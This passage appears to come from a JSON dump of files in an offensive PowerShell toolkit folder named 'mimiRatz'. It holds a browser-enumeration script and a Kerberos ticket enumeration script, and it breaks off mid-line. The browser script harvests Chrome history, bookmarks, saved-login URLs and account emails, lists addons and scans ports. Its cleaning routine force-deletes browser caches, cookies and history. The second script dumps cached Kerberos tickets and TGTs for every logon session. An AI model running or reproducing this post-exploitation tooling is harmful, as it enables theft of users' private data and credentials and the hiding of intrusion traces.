}else{\r\n $StoreData = Get-Process chrome|Select -ExpandProperty MainWindowTitle\r\n $ParseData = $StoreData|where {$_ -ne \"\"}\r\n $MyPSObject = $ParseData -replace '- Google Chrome',''\r\n ## Write my PSobject to logfile\r\n echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Retrieve Email(s) from Google CHROME preferencies File ..\r\n If($Preferencies_Path){\r\n $Parse_String = $Preferencies_Path.split(\",\")\r\n $Search_Email = $Parse_String|select-string \"email\"\r\n $Parse_Dump = $Search_Email -replace '\"','' -replace 'email:',''\r\n If(-not($Search_Email) -or $Search_Email -eq $null){\r\n echo \"Email : {None Email's Found}`n\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n ## Build new PSObject to store emails found\r\n $Store = ForEach ($Email in $Parse_Dump){\r\n New-Object -TypeName PSObject -Property @{\r\n Emails = $Email\r\n }\r\n }\r\n ## Write new PSObject to logfile\r\n echo $Store >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n\r\n ## Retrieve Chrome History\r\n # Source: https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1\r\n echo \"`nChrome History\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"--------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\")){\r\n echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Regex = '(htt(p|s))://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n $History_Path = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\"\r\n $Get_Values = Get-Content -Path \"$History_Path\"|Select-String -AllMatches $Regex |% {($_.Matches).Value} |Sort -Unique\r\n $Get_Values|ForEach-Object {\r\n $Key = $_\r\n if ($Key -match $Search){\r\n echo \"$_\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n\r\n ## Retrieve Chrome bookmarks\r\n echo \"`nChrome Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"----------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks\")) {\r\n echo \"{Could not find any Bookmarks}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Json = Get-Content \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks\"\r\n $Output = ConvertFrom-Json20($Json) ## TODO:\r\n $Jsonobject = $Output.roots.bookmark_bar.children\r\n $Jsonobject.url|Sort -Unique|ForEach-Object {\r\n if ($_ -match $Search) {\r\n echo \"$_\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n\r\n ## Retrieve Chrome URL logins\r\n echo \"`nEnumerating LogIns\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\")){\r\n echo \"{None URL's found}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Regex = '(htt(p|s))://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n $ReadData = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\"\r\n $Json = Get-Content -Path \"$ReadData\"|Select-String -AllMatches $Regex |% {($_.Matches).Value} |Sort -Unique\r\n echo $Json >> $LogFilePath\\BrowserEnum.log\r\n }\r\n}\r\n\r\n\r\nfunction ADDONS { \r\n ## Retrieve IE addons\r\n echo \"`n`n[ IE|MSEDGE ]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"`nName\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"----\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Settings\")){\r\n echo \"{None addons found}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n If(-not(Test-Path HKCR:)){New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT|Out-Null} \r\n $Registry_Keys = @( \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Settings\",\r\n \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\Browser Helper Objects\",\r\n \"HKLM:\\Software\\Microsoft\\Internet Explorer\\URLSearchHooks\",\r\n \"HKLM:\\Software\\Microsoft\\Internet Explorer\\Extensions\",\r\n \"HKCU:\\Software\\Microsoft\\Internet Explorer\\Extensions\" )\r\n $Registry_Keys|Get-ChildItem -Recurse -ErrorAction SilentlyContinue|Select -ExpandProperty PSChildName | \r\n ForEach-Object { \r\n If(Test-Path \"HKCR:\\CLSID\\$_\"){ \r\n $CLSID = Get-ItemProperty -Path \"HKCR:\\CLSID\\$_\" | Select-Object @{n=\"Name\";e=\"(default)\"}\r\n $CLSIData = $CLSID -replace '@{Name=','' -replace '}',''\r\n echo \"$CLSIData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n\r\n ## Retrieve firefox addons\r\n echo \"`n`n[ Firefox ]\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\extensions.json\")){\r\n $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\extensions.json\" # (IEFP)\r\n If(-not(Test-Path \"$Bookmarks_Path\")){\r\n echo \"{None addons found}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\extensions.json\" # (IEFP)\r\n $Json = Get-Content \"$Bookmarks_Path\" -Raw|ConvertFrom-Json|select *\r\n $Json.addons|select-object -property defaultLocale|Select-Object -ExpandProperty defaultLocale|Select-Object Name,description >> $LogFilePath\\BrowserEnum.log\r\n } \r\n }else{\r\n $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\extensions.json\"\r\n $Json = Get-Content \"$Bookmarks_Path\" -Raw|ConvertFrom-Json|select *\r\n $Json.addons|select-object -property defaultLocale|Select-Object -ExpandProperty defaultLocale|Select-Object Name,description >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Retrieve Chrome addons\r\n echo \"`n`n[ Chrome ]\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"\\\\$env:COMPUTERNAME\\c$\\users\\*\\appdata\\local\\Google\\Chrome\\User Data\\Default\\Extensions\\*\\*\\manifest.json\" -ErrorAction SilentlyContinue)){\r\n echo \"{None addons found}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Json = Get-Content \"\\\\$env:COMPUTERNAME\\c$\\users\\*\\appdata\\local\\Google\\Chrome\\User Data\\Default\\Extensions\\*\\*\\manifest.json\" -Raw -ErrorAction SilentlyContinue|ConvertFrom-Json|select *\r\n $Json|select-object -property name,version,update_url >> $LogFilePath\\BrowserEnum.log\r\n }\r\n}\r\n \r\n\r\n ## Function tcp port scanner\r\nfunction PORTSCANNER {\r\n[int]$counter = 0\r\n\r\n If(-not($param2)){$PortRange = \"21,22,23,25,80,110,135,137,139,443,445,666,1433,3389,8080\"}else{$PortRange = $param2}\r\n $Remote_Host = (Test-Connection -ComputerName (hostname) -Count 1 -ErrorAction SilentlyContinue).IPV4Address.IPAddressToString\r\n echo \"`n`nRemote-Host Status Proto Port\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"----------- ------ ----- ----\" >> $LogFilePath\\BrowserEnum.log\r\n $PortRange -split(',')|Foreach-Object -Process {\r\n If((Test-NetConnection $Remote_Host -Port $_ -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){\r\n echo \"$Remote_Host Open tcp $_ *\" >> $LogFilePath\\BrowserEnum.log\r\n $counter++\r\n }else{\r\n echo \"$Remote_Host Closed tcp $_\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n echo \"`nTotal open tcp ports found => $counter\" >> $LogFilePath\\BrowserEnum.log\r\n}\r\n\r\n\r\n## Function browser cleaner\r\nfunction BROWSER_CLEANTRACKS {\r\n[int]$DaysToDelete = 0 # delete all files less than the current date ..\r\n\r\n If($RUIUIUi0 -iMatch '^(yes)$')\r\n {\r\n ## Global cleaning\r\n ipconfig /flushdns|Out-Null\r\n C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 1|Out-Null # Clear History\r\n C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 2|Out-Null # Clear Cookies\r\n C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 8|Out-Null # Clear Temporary Files\r\n # C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 255|Out-Null # Clear cookies, history data, internet files, and passwords\r\n }\r\n\r\n\r\n ## Clean Internet Explorer temporary files\r\n echo \" [IE|MsEdge Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Microsoft\\Windows\\WER\\ERC\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCache\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCookies\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Microsoft\\Windows\\IEDownloadHistory\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Microsoft\\Windows\\Temporary Internet Files\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Common locations\r\n $TempFiles = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\WER\\ERC\"\r\n $InetCache = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCache\"\r\n $Cachecook = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCookies\"\r\n $CacheDown = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\IEDownloadHistory\"\r\n $CacheFile = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\Temporary Internet Files\"\r\n\r\n ## Locations Recursive Query\r\n $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$TempFiles\",\"$InetCache\",\"$Cachecook\",\"$CacheDown\" -Recurse -EA SilentlyContinue|Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n {\r\n ForEach($Item in $RemoveMe)\r\n {\r\n ## Delete selected files\r\n $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n echo \" Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n }\r\n }\r\n Else\r\n {\r\n echo \" None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n\r\n ## Clean Mozilla Firefox temporary files\r\n echo \"`n`n [FireFox Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Common locations\r\n $CacheFile = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache\"\r\n $TempFiles = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache\"\r\n $OutraFile = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache2\\entries\"\r\n $IefpFiles = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache2\\entries\"\r\n\r\n ## Locations Recursive Query\r\n $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$TempFiles\",\"$OutraFile\",\"$IefpFiles\" -Recurse -EA SilentlyContinue|Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n {\r\n ForEach($Item in $RemoveMe)\r\n {\r\n ## Delete selected files\r\n $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n echo \" Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n }\r\n }\r\n Else\r\n {\r\n echo \" None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n\r\n ## Clean Google Chrome temporary files\r\n echo \"`n`n [Chrome Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\VisitedLinks\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Common locations\r\n $CacheFile = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache\"\r\n $Cachecook = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies\"\r\n $Cachehist = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\"\r\n $Cachelink = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\VisitedLinks\"\r\n $TempFiles = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache2\\entries\"\r\n\r\n ## Locations Recursive Query\r\n $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$Cachecook\",\"$Cachehist\",\"$Cachelink\",\"$TempFiles\" -Recurse -EA SilentlyContinue|Where-Object{ ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n {\r\n ForEach($Item in $RemoveMe)\r\n {\r\n ## Delete selected files\r\n $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n echo \" Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n }\r\n }\r\n Else\r\n {\r\n echo \" None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n\r\n ## Clean Opera temporary files\r\n echo \"`n`n [Opera Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\Opera Software\\Opera GX Stable\\Cache\\Cache_Data\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Common locations\r\n $OpCache = \"$Env:LOCALAPPDATA\\Opera Software\"\r\n $OpName = (Get-ChildItem -Path \"$OpCache\" -Recurse -Force|Where-Object {$_.PSIsContainer -eq $true -and $_.Name -match \"^(Cache)$\"}).FullName\r\n\r\n ## Locations Recursive Query\r\n $OpClean = (Get-ChildItem -Path \"${OpName}\\Cache_Data\"|Where-Object {$_.PSIsContainer -eq $false -and $_.Name -ne \"index\"}).FullName\r\n\r\n If(-not([string]::IsNullOrEmpty($OpClean)))\r\n {\r\n ForEach($Item in $OpClean)\r\n {\r\n ## Delete selected files\r\n $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n echo \" Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n }\r\n }\r\n Else\r\n {\r\n echo \" None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n\r\n ## Clean Brave temporary files\r\n echo \"`n`n [Brave Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\UserData\\Default\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" $Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\\Cache_Data\" >> $LogFilePath\\BrowserEnum.log\r\n echo \" ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Common locations\r\n $OpCache = \"$Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\"\r\n $OpUserd = \"$Env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\UserData\\Default\"\r\n $OpDatas = \"$Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\\Cache_Data\"\r\n\r\n ## Locations Recursive Query\r\n $OpClean = (Get-ChildItem -Path \"${OpCache}\",\"${OpDatas}\",\"${OpUserd}\"|Where-Object {$_.PSIsContainer -eq $false}).FullName\r\n\r\n If(-not([string]::IsNullOrEmpty($OpClean)))\r\n {\r\n ForEach($Item in $OpClean)\r\n {\r\n ## Delete selected files\r\n $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n echo \" Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n }\r\n }\r\n Else\r\n {\r\n echo \" None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n}\r\n\r\n## Jump Links (Functions)\r\nIf($param1 -eq \"-IE\"){IE_Dump}\r\nIf($param1 -eq \"-CHROME\"){CHROME}\r\nIf($param1 -eq \"-ADDONS\"){ADDONS}\r\nIf($param1 -eq \"-FIREFOX\"){FIREFOX}\r\nIf($param1 -eq \"-OPERA\"){OPERA}\r\nIf($param1 -eq \"-CREDS\"){CREDS_DUMP}\r\nIf($param1 -eq \"-SCAN\"){PORTSCANNER}\r\nIf($param1 -eq \"-RECON\"){BROWSER_RECON}\r\nIf($param1 -eq \"-CLEAN\"){BROWSER_CLEANTRACKS}\r\nIf($param1 -eq \"-ALL\"){BROWSER_RECON;IE_Dump;FIREFOX;CHROME;OPERA}\r\n\r\n## NOTE: ForEach - Build PSObject displays ..\r\n# $StoreData = ForEach ($Key in $Input_String){\r\n# New-Object -TypeName PSObject -Property @{\r\n# Data = $Key\r\n# } \r\n# }\r\n# Write-Host $StoreData|Out-File \"$env:tmp\\report.log\"\r\n\r\n## Retrieve Remote Info from LogFile\r\nWrite-Host \"\"\r\nGet-Content \"$LogFilePath\\BrowserEnum.log\"\r\nRemove-Item -Path \"$LogFilePath\\BrowserEnum.log\" -Force\r\nExit\r\n" }, { "path": "mimiRatz/GetKerbTix.ps1", "content": "#************************************************\r\n# GetKerbTix.ps1\r\n# Version 1.0\r\n# Date: 6-11-2014\r\n# Author: Tim Springston [MSFT]\r\n# Description: On a specific computer the script is ran on, \r\n# this script finds all logon sessions which have Kerberos\r\n# \ttickets cached and enumerates the tickets and any ticket granting tickets.\r\n# The tickets may be from remote or interactive users and may be \r\n# any logon type session (network, batch, interactive, remote interactive...).\r\n# This script will run on Windows Server 2008/Vista and later.\r\n#************************************************\r\n\r\n$FormatEnumerationLimit = -1\r\n$ComputerName = $env:COMPUTERNAME\r\n$UserName = [Security.Principal.WindowsIdentity]::GetCurrent().name\r\ntry{#Supress Domain not foud outputs\r\n$ComputerDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().name\r\n}catch{}\r\n$Date = Get-Date\r\n\r\n\r\n#Prepare an output file to place info into.\r\n$ExportFile = \"C:\\windows\\temp\\\" + $ComputerName + \"_CachedKerberosTickets.txt\"\r\n\"Cached Kerberos Tickets\" | Out-File $ExportFile -Encoding utf8\r\n\"Logged on User:$UserName\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Computer name: $ComputerName\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Computer Domain: $ComputerDomain\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Date: $Date\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"************************************\" | Out-File $ExportFile -Append -Encoding utf8\r\n\r\nfunction GetKerbSessions\r\n\t{\r\n\t$Sessions = @()\r\n\t$WMILogonSessions = gwmi win32_LogonSession\r\n\tforeach ($WMILogonSession in $WMILogonSessions)\r\n\t\t{\r\n\t\t$LUID = [Convert]::ToString($WMILogonSession.LogonID, 16)\r\n\t\t$LUID = '0x' + $LUID\r\n\t\t$Sessions += $LUID\r\n\t\t}\r\n\treturn $sessions\r\n\t}\r\n\t\r\nfunction GetKerbSessionInfo\r\n\t{\r\n\t$OS = gwmi win32_operatingsystem\r\n\t$sessions = New-Object PSObject\r\n\tif ($OS.Buildnumber -ge 9200)\r\n\t\t{\r\n\t\t$KlistSessions = klist sessions\r\n\t\t$Counter = 0\r\n\r\n\t\tforeach ($item in $KlistSessions)\r\n\t\t\t{\r\n\t\t\tif ($item -match \"^\\[.*\\]\")\r\n\t\t\t\t{\r\n\t\t\t\t$LogonId = $item.split(' ')[3]\r\n\t\t\t\t$LogonId = $LogonId.Replace('0:','')\r\n\t\t\t\t$Identity = $item.split(' ')[4]\r\n\t\t\t\t$Token5 = $item.Split(' ')[5]\r\n\t\t\t\t$AuthnMethod = $Token5.Split(':')[0]\r\n\t\t\t\t$LogonType = $Token5.Split(':')[1]\r\n\t\t\t\t$Session = New-Object PSObject\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"SessionID\" -Value $LogonId\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Identity\" -Value $Identity\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Authentication Method\" -Value $AuthnMethod\t\t\t\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Logon Type\" -Value $LogonType\r\n\t\t\t\t\r\n\t\t\t\tAdd-Member -InputObject $sessions -MemberType NoteProperty -Name $LogonId -Value $Session\r\n\t\t\t\t$Session = $null\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\tif ($OS.Buildnumber -lt 9200)\r\n\t\t{\r\n\t\t$WMILogonSessions = gwmi win32_LogonSession\r\n\t\tforeach ($WMILogonSession in $WMILogonSessions)\r\n\t\t\t{\r\n\t\t\t$LUID = [Convert]::ToString($WMILogonSession.LogonID, 16)\r\n\t\t\t$LUID = '0x' + $LUID\r\n\t\t\t$Session = New-Object PSObject\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"SessionID\" -Value $LUID\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Identity\" -Value \"Not available\"\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Authentication Method\" -Value $WMILogonSession.AuthenticationPackage\t\t\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Logon Type\" -Value $WMILogonSession.LogonType\r\n\t\t\t\t\r\n\t\t\tAdd-Member -InputObject $sessions -MemberType NoteProperty -Name $LUID -Value $Session\r\n\t\t\t$Session = $null\r\n\t\t\t}\r\n\t\t}\r\n\treturn $sessions\r\n\t}\r\n\r\nfunction ReturnSessionTGTs\r\n\t{\r\n\tparam ($SessionID = $null)\r\n\tif ($SessionID -eq $null)\r\n\t\t{\r\n\t\t$RawTGT = klist.exe tgt\r\n\t\t}\r\n\t\telse\r\n\t\t\t{\r\n\t\t\t$RawTGT = klist.exe tgt -li $sessionID\r\n\t\t\t}\r\n\t$TGT = @()\r\n\tforeach ($Line in $RawTGT)\r\n\t\t{\r\n\t\tif ($Line.length -ge 1)\r\n\t\t\t{\r\n\t\t\t$TGT += $Line\r\n\t\t\t}\r\n\t\t}\r\n\tif ($TGT -contains 'Error calling API LsaCallAuthenticationPackage (Ticket Granting Ticket substatus): 1312')\r\n\t\t{$TGT = 'No ticket granting ticket cached in session.'}\r\n\treturn $TGT\r\n\t}\t\r\n\r\nfunction ReturnSessionTickets \r\n\t{\r\n\tparam ($SessionID = $null)\r\n\t$OS = gwmi win32_operatingsystem\r\n\tif ($SessionID -eq $null)\r\n\t\t{\r\n\t\t$TicketsArray = klist.exe tickets\r\n\t\t}\r\n\t\telse\r\n\t\t\t{\r\n\t\t\t$TicketsArray = klist.exe tickets -li $sessionID\r\n\t\t\t}\r\n\t$Counter = 0\r\n\t$TicketsObject = New-Object PSObject\r\n\tforeach ($line in $TicketsArray)\r\n\t\t{\r\n\t\tif ($line -match \"^#\\d\")\r\n\t\t\t{\r\n\t\t\t$Ticket = New-Object PSObject\r\n\t\t\t$Number = $Line.Split('>')[0]\r\n\t\t\t$Line1 = $Line.Split('>')[1]\r\n\t\t\t$TicketNumber = \"Ticket \" + $Number\r\n\t\t\t$Client = $Line1 ;\t$Client = $Client.Replace('Client:','') ; $Client = $Client.Substring(2)\r\n\t\t\t$Server = $TicketsArray[$Counter+1]; $Server = $Server.Replace('Server:','') ;$Server = $Server.substring(2)\r\n\t\t\t$KerbTicketEType = $TicketsArray[$Counter+2];$KerbTicketEType = $KerbTicketEType.Replace('KerbTicket Encryption Type:','');$KerbTicketEType = $KerbTicketEType.substring(2)\r\n\t\t\t$TickFlags = $TicketsArray[$Counter+3];$TickFlags = $TickFlags.Replace('Ticket Flags','');$TickFlags = $TickFlags.substring(2)\r\n\t\t\t$StartTime = $TicketsArray[$Counter+4];$StartTime = $StartTime.Replace('Start Time:','');$StartTime = $StartTime.substring(2)\r\n\t\t\t$EndTime = $TicketsArray[$Counter+5];$EndTime = $EndTime.Replace('End Time:','');$EndTime = $EndTime.substring(4)\r\n\t\t\t$RenewTime = $TicketsArray[$Counter+6];$RenewTime = $RenewTime.Replace('Renew Time:','');$RenewTime = $RenewTime.substring(2)\r\n\t\t\t$SessionKey = $TicketsArray[$Counter+7];$SessionKey = $SessionKey.Replace('Session Key Type:','');$SessionKey = $SessionKey.substring(2)\r\n\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Client\" -Value $Client\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Server\" -Value $Server\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"KerbTicket Encryption Type\" -Value $KerbTicketEType\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Ticket Flags\" -Value $TickFlags\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Start Time\" -Value $StartTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"End Time\" -Value $EndTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Renew Time\" -Value $RenewTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Session Key Type\" -Value $SessionKey\r\n\r\n\t\t\tif ($OS.BuildNumber -ge 9200)\r\n\t\t\t\t{\r\n\t\t\t\t$CacheFlags = $TicketsArray[$Counter+8];$CacheFlags = $CacheFlags.Replace('Cache Flags:','');$CacheFlags = $CacheFlags.substring(2)\r\n\t\t\t\t$KDCCalled = $TicketsArray[$Counter+9];$KDCCalled = $KDCCalled.Replace('Kdc Called:','');$KDCCalled = $KDCCalled.substring(2)\r\n\t\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Cache Flags\" -Value $CacheFlags\r\n\t\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"KDC Called\" -Value $KDCCalled\r\n\t\t\t\t}\r\n\t\t\tAdd-Member -InputObject $TicketsObject -MemberType NoteProperty -Name $TicketNumber -Value $Ticket\r\n\t\t\t$Ticket = $null\r\n\t\t\t}\r\n\t\t$Counter++\r\n\t\t\r\n\r\n\t\t}\r\n\treturn $TicketsObject\r\n\t}\t\r\n\r\n$OS = gwmi win32_operatingsystem\r\n$sessions = getkerbsessions\r\n$sessioninfo = GetKerbSessionInfo\r\nforeach ($Session in $sessions)\r\n{\t\r\n\t#Get Session details as well\r\n\t$currentsessioninfo = $sessioninfo.$session\r\n\t$ID = $currentsessioninfo.identity\r\n\t$SessionID = $currentsessioninfo.SessionID\r\n\t$LogonType = $currentsessioninfo.'Logon Type'\r\n\t$AuthMethod = 